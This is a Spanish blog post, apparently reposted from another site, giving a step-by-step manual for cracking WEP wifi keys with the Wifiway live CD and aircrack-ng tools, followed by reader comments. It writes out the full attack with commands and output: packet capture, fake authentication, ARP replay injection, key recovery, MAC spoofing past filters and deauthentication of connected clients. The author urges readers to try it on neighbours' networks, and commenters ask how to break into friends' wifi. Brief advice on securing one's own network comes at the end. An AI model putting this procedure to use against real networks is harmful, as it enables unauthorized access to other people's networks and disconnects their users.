Manual para hackear una red wifi

Manual sacado de improvisa.com al que he llegado por El blog de Alcanjo

Con este manual intentaremos demostraros lo fácil que es que os rompan la clave WEP de vuestra red inalámbrica. Hablaremos de como realizar este hack con inyección de paquetes ARP con la tarjeta Intel 3945 ABG, posibles errores y como no, posibles soluciones. También lo he conseguido con las tarjetas con chipset Zydas.

Por daros una idea de lo simple que es, a una distancia medio razonable, un par de centenar de metros, una conexión de un cliente autenticado y unos 10 minutos nos bastarán para hackear cualquier WEP de cualquier longitud, a mayor longitud de clave WEP algo más de tiempo.

Sin más pongamonos manos a la obra:­

Para el experimento hemos utilizado la distribución en CD LIVE de www.seguridadwireless.net concretamente la distribución se llama wifiway 0.6 (ya existe la versión 0.8, si alguien prueba con ella que nos cuente) y podemos descargarla de estos dos sitios, recomiendo el segundo (bastante más rápido):

ftp://files.tuto-fr.com:8080/distro/wifiway-0.6.iso
http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso

Una vez que tenemos descargada y quemada la nueva distribución la meteremos en nuestro portatil, debe tener la tarjeta Intel 3945 ABG con la que seremos capaces de inyectar paquetes, lo bueno de esta tarjeta es que a día de hoy viene en un montón de portátiles.

El fallo que le he visto a la distribución es que debemos saber de antemano cual será nuestro objetivo, ya que una vez que entramos a WifiWay 0.6 debemos saber el canal que queremos atacar. Podemos por ejemplo saber esto con swscanner (netstumbler para linux, de Ivan Forcada) o con netstumbler (para windows), una vez que tenemos el canal del objetivo arrancamos WifiWay.

Despues de haberle dicho nuestra zona de tiempo y nuestro idioma, nos dejara en una consola, pulsad ahí “startx”, nos arrancara las X de la distribución.

Lo curioso de la distribución es que divide la tarjeta Intel 3945 ABG en dos interfaces, la rtap0 para escuchar en modo monitor y la wifi0 para inyectar código al AP Objetivo.

Como ya sabemos el canal del objetivo es hora de lanzar el script que nos trae para la configuración de nuestra tarjeta, abriremos una consola y teclearemos:

wifiway:/# ipw3945_es.sh

Nos preguntará el canal, el que hayamos sacado con swscanner
No preguntará el Rate de captura, siempre a 2
Y por ultimo la MAC del AP Objetivo: yo aquí de primeras le doy la 00:11:22:33:44:55

Ahora lanzamos en la misma consola:

wifiway:/# airodump-ng rtap0

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              NETGEAR
00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear

BSSID              STATION            PWR  Lost  Packets  Probes

00:14:6C:7A:41:81  00:0F:B5:32:31:31   51     2       14
(not associated)   00:14:A4:3F:8D:13   19     0        4  mossy
00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5

Debemos apuntar (o copiar seleccionando, para los no iniciados en linux, copiar se hace simplemente seleccionando y pegar con los dos botones a la vez del ratón) la MAC del AP Objetivo y su ESSID.

Lancemos de nuevo el script para la tarjeta Intel 3945 ABG, pero esta vez diciéndole la MAC del AP de verdad:

wifiway:/# ipw3945_es.sh

Canal: El correspondiente al AP Objetivo
Rate : 2
MAC : MAC del AP Objetivo

Ya tenemos preparada la tarjeta para empezar a inyectar código, tecleando en la misma consola los siguientes códigos, mandaremos con nuestra Intel 3945 ABG un paquetito de asociación al AP Objetivo:

wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful 🙂

Acabamos de ver que se ha autenticado contra el AP, es decir aceptará todo lo que le mandemos siempre y cuando vaya encriptado con la wep, lo que haremos ahora será capturar paquetes encriptados y reenviarlos de nuevo al AP, previa copia en nuestro disco duro para posterior análisis:

wifiway:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0

Saving ARP requests in replay_arp-0219-123051.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets…

Ahora es momento de abrir otra consola y poner a capturar a airodump:

wifiway:/# airodump-ng -w /tmp/dump rtap0

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              NETGEAR
00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear

BSSID              STATION            PWR  Lost  Packets  Probes

00:14:6C:7A:41:81  00:0F:B5:32:31:31   51     2       14
(not associated)   00:14:A4:3F:8D:13   19     0        4  mossy
00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5

Vale debemos esperar a que la primera consola, en la que está corriendo el aireplay -3 a que capture algún paquete ARP y en cuanto lo haga empezará a inyectar para generar tráfico encriptado con la clave WEP del AP Objetivo. En cuanto esto ocurra en la segunda consola, en la que esta corriendo airodump, empezaremos a ver como el numero de paquetes DATA del Ap Objetivo empieza a subir.

Cuando debemos parar, buena pregunta, para claves de 64 bits con 200.000 paquetes DATA será suficiente, para claves de 128 bits, unos 400.000…. Como no sabemos de que tamaño es la clave podemos esperar a tener 200.000 DATA y en una tercera consola, sin parar ninguna de las otras dos, ejecutar:

wifiway:/# aircrack-ptw /tmp/dump-01.cap

This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:19:5B:97:F3:64 keyindex=0
stats for bssid 00:19:5B:97:F3:64 keyindex=0 packets=21938
Found key with len 13: 44 44 44 44 44 44 44 44 44 44 44 44 44

Si nos da la clave ya podremos parar las otras consolas, si aun no nos la da seguiremos esperando…..

10 minutos despues……………

Seguro que ya la tenemos.

Con el Chipset de Zydas (Añadido el 9-Octubre-2007)

Con el chipset de Zydas es incluso más simple, no necesitaremos lanzar ningun script, directamente nos escuchara en todos los canales y autonegociará el Rate.

Debemos seguir todas las instrucciones que se siguen para el driver de Intel, dejar claro que el driver de Zydas NO divide la interfaz en rtap y wifi0. Nos lo dejara como eth2 o eth1, dependiendo de las interfaces que tengamos. Utilizaremos para todo la misma interfaz, la que tenga nuestra tarjeta con driver Zydas.
Problemas con los que nos podemos encontrar:

NO TENGO ESPACIO EN /tmp/:

Como os he dicho una vez que alguien conecte a ese AP lo tendremos en cuestión de 10 minutos, pero hasta que alguien conecte pueden pasar horas incluso días, el problema que nos encontramos al lanzar airodump-ng -w /tmp/dump rtap0 es que tenemos poco espacio, no hay problema WifiWay monta por defecto nuestras particiones NTFS o FAT32, las deja en /mnt/sda…. Lancemos (en mi caso, tengo una carpeta llamada comparto en mi segunda particion NTFSm ahí si que hay gigas):

wifiway:/# airodump-ng -w /mnt/sda5/comparto/dump rtap0

Con esto podemos esperar hasta semanas a que el AP Objetivo reciba una conexión.

NO ASOCIA CON aireplay-ng -1 0

Muy bien se puede deber a un par de cosas, por lo que a mi me ha ocurrido.

No tenemos la señal suficiente (esto deberiamos saberlo con swscanner o netstumbler), sigue intentandolo, pero te aseguro que la distancia es importante, despues lo tendrás bastante fastidiado en la inyección de paquetes, veras que no suben :-(, intenta acercarte.

Si estas seguro de tener señal suficiente, entonces seguramente el AP tenga Filtro MAC, no ocurre nada, podremos HAckearlo exactamente igual, con un par de trucos:

Si os fijáis airodump tiene dos apartados, uno para APS Objetivos (la parte de arriba) y otra parate de clientes conectados (la de abajo), cuestión de esperar a que un cliente con una mac valida se conecte al AP Objetivo y genere trafico, de esta forma sabremos que la MAC es valida para el AP, copiaremos esa MAC y cambiaremos la nuestra por la del cliente con este código:

wifiway:/# ifconfig wifi0 hw ether MAC_CLIENTE_AUTENTICADO

Ahora debemos comenzar el proceso exactamente igual pero poniendo nuestra “nueva” MAC.

INYECTA ARP PERO NO SUBEN LOS DATA

Casi seguro que es por distancia, en un par de experimentos me ha ocurrido eso, no sube o sube muy lento en relación con los paquetes ARP inyectados, es cuestión de distancia, los paquetes enviados al AP no le llegan.

Mi consejo es que vayáis probando con la vuestra y luego con alguna otra 😉

Si alguien tiene algún problema más que lo vaya escribiendo en el FORO e iremos intentando resolver todas las dudas.

El caso es que el AP al que estamos conectandonos nos desautentica, se soluciona volviendo a asociarse con:

wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0

Podemos utilizar el truco de Tase, podemos poner en la linea de comando lo siguiente:

wifiway:/# while [true] do aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0; sleep 180 done

HAY DATA PERO NO ARP

Esto se debe a que cuando te has puesto a inyectar paquetes el cliente ya estaba conectado y no genera paquetes ARP, hay dos soluciones, una es esperar a que vuelva a conectarse y otra segunda es enviar un paquete de falsa desautenticación al AP para que desconecte al cliente que está asociado y de esa forma el cliente tenga que volver a asociarse, generando de esta forma paquetes ARP para su posterior inyección, para hacerlo debemos teclear en una consola nueva lo siguiente, sin cancelar ninguna de las otras (bendito aireplay-ng ;-)):

wifiway:/# aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENTE_A_DESAUTENTICAR wifi0

CONVERSOR UNIVERSAL DE CODIFICACIONES

He puesto en Improvisa un Conversor Universal para pasar de cualquier código a cualquier código, por si alguien quiere cambiar la clave de HEX. (que es como nos la va a dar aircrack-ptw) a ASCII, podeis visitarlo aquí, tambien en la sección de Informática en el árbol de la izquierda.

Conversor Universal en Improvisa
SOLUCIONES PARA ASEGURAR NUESTRA WIFI:

Utilicemos, si nos es posible, WPA, bastante mas difícil de hackear (también es posible, a lo mejor el próximo experimento es con WPA).

Utiliza cable, no se porque pero los que conocen un poquitín el mundo del wifi siempre intentan tener cable 😉

La que mas me gusta es, comparte la wifi, la mayoría de nosotros estamos obsesionados con que no nos entren en la wifi, pero ¿por que?, podemos montarnos un NoCatSplash, la gente entrará a nuestra wifi con un ancho de banda máximo y encima le recibiremos con una pagina del tipo: “Está usted navegando gracias a la wifi del Vecino del 3º F, no me cobren la comunidad” o alguna gracias de esas ;-). Para montar NoCATSpalsh necesitaremos un Openwrt, y un hardware que lo soporte, unos 60 euros. Si no queremos gastarnos nada y tenemos un servidor también podemos hacerlo con Squid y CAPO, un plugin para Squid que funciona igual que NoCatSplash. Estas dos técnicas son las que utilizamos en la Red Inalámbrica de Guadalajara GuadaWireless.

14 thoughts to “Manual para hackear una red wifi”

  1. Mira tengo un iphone y quiero poder hackear las redes wifi desde le se puede lograr este procedimiento

  2. ocupo un codigo de red inalambrico sin programas, sin cable, sin equipos costosos hay una clave que tiene un amigo que no se como va era gdbbbbdg no se algo parecido y no lo se lo ocupo eso es todo lo que ocupo bie

  3. La putada de compartir una red o que te entren es que te pillan facilmente las contraseñas de correo y otras cosas.

  4. hola espero que me puedas solucionar esto cuando empiezo a asosiar a una red cuando hay varias en el mismo canal se la pasa enviando Authentication successful
    Authentication successful
    Authentication successful
    Authentication successful

    y no sigue de ahi tienes alguna solusion para esto ¿?¿?¿?¿

    Grasias

  5. Para el que no se quiera complicar con programas ni historias, ha salido al mercado wifirobin que desancripta claves wifi automaticamente pulsando un boton, y tiene un alcance de hasta 2 km, en otras palabras adsl gratis a donde quieras que vayas.

    Mas informacion aqui: http://www.mmmestanza.com/adslgratis.html

    NO ES COÑA, FUNCIONA DE MARAVILLAS.

  6. hola tengo windows 7 .como puedo colgarme de las redes de amigas y amigos ,algo q sea mas facil para pescar las redes y poder entrar a internet con esas claves…no se mucho de esta ,pero quiero aprender ,gracias

  7. ¿y no es mucho más sencillo simplemente usar el Beini? (ya sé que va en distribución linux autobooteable, pero no tienes que teclear nada) ¿hay forma de desencriptar claves WPAm(ya sea con wifiway, backtrack, o lo que sea
    ?

Leave a Reply

Your email address will not be published. Required fields are marked *